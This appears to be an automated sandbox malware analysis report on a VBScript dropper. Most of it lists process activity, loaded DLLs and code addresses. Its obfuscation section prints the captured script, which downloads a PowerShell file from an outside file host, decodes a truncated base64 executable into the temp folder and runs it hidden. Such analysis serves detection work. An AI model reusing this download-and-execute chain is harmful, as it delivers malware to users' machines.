            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E3F07_2_02E1E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E5739A7_2_02E5739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD34C7_2_02DFD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECA3527_2_02ECA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC132D7_2_02EC132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC70E97_2_02EC70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECF0E07_2_02ECF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E170C07_2_02E170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF0CC7_2_02EBF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC81CC7_2_02EC81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED01AA7_2_02ED01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1B1B07_2_02E1B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDB16B7_2_02EDB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E4516C7_2_02E4516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF1727_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E001007_2_02E00100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAA1187_2_02EAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2C6E07_2_02E2C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC16CC7_2_02EC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0C7C07_2_02E0C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECF7B07_2_02ECF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E107707_2_02E10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E347507_2_02E34750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBE4F67_2_02EBE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E014607_2_02E01460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC24467_2_02EC2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECF43F7_2_02ECF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAD5B07_2_02EAD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED05917_2_02ED0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC75717_2_02EC7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E105357_2_02E10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBDAC67_2_02EBDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E55AA07_2_02E55AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EADAAC7_2_02EADAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0EA807_2_02E0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E83A6C7_2_02E83A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFA497_2_02ECFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC7A467_2_02EC7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E4DBF97_2_02E4DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC6BD77_2_02EC6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2FB807_2_02E2FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFB767_2_02ECFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECAB407_2_02ECAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E138E07_2_02E138E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3E8F07_2_02E3E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF68B87_2_02DF68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E128407_2_02E12840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1A8407_2_02E1A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E129A07_2_02E129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDA9A67_2_02EDA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E269627_2_02E26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E199507_2_02E19950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B9507_2_02E2B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECEEDB7_2_02ECEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E19EB07_2_02E19EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E22E907_2_02E22E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECCE937_2_02ECCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10E597_2_02E10E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECEE267_2_02ECEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1CFE07_2_02E1CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E02FC87_2_02E02FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFFB17_2_02ECFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11F927_2_02E11F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E84F407_2_02E84F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E52F287_2_02E52F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E30F307_2_02E30F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFF097_2_02ECFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E00CF27_2_02E00CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFCF27_2_02ECFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB0CB57_2_02EB0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E89C327_2_02E89C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10C007_2_02E10C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0ADE07_2_02E0ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2FDC07_2_02E2FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E28DBF7_2_02E28DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC7D737_2_02EC7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E13D407_2_02E13D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC1D5A7_2_02EC1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1AD007_2_02E1AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02E7EA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02DFB970 appears 263 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02E45130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02E57E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02E8F290 appears 105 times
            Source: z68scancopy.vbsInitial sample: Strings found which are bigger than 50
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: x.exe.4.dr, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.1d89066c238.0.raw.unpack, AesUtilities.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@8/7@1/1
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\q8ynky[1].ps1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: z68scancopy.vbsReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/q8ynky.ps1", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.", "0", "true")
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAO
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB44282D push esp; ret 4_2_00007FFAAB442912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004020CB push 714A2200h; ret 7_2_004020E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041E960 push eax; iretd 7_2_0041E961
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004159D3 push es; retf 54F1h7_2_00415A1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004122C0 push 91881475h; iretd 7_2_004122D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004032D0 push eax; ret 7_2_004032D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040AAF2 push es; iretd 7_2_0040AB09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404A95 push esi; iretd 7_2_00404AAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404AA3 push esi; iretd 7_2_00404AAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004122A6 push 91881475h; iretd 7_2_004122D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004015F3 push 6F58A9ABh; retf 7_2_004015FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004105FB push es; retf 7_2_004105FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00411623 push esi; iretd 7_2_004116D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418FF6 push es; ret 7_2_0041904A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E009AD push ecx; mov dword ptr [esp], ecx7_2_02E009B6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
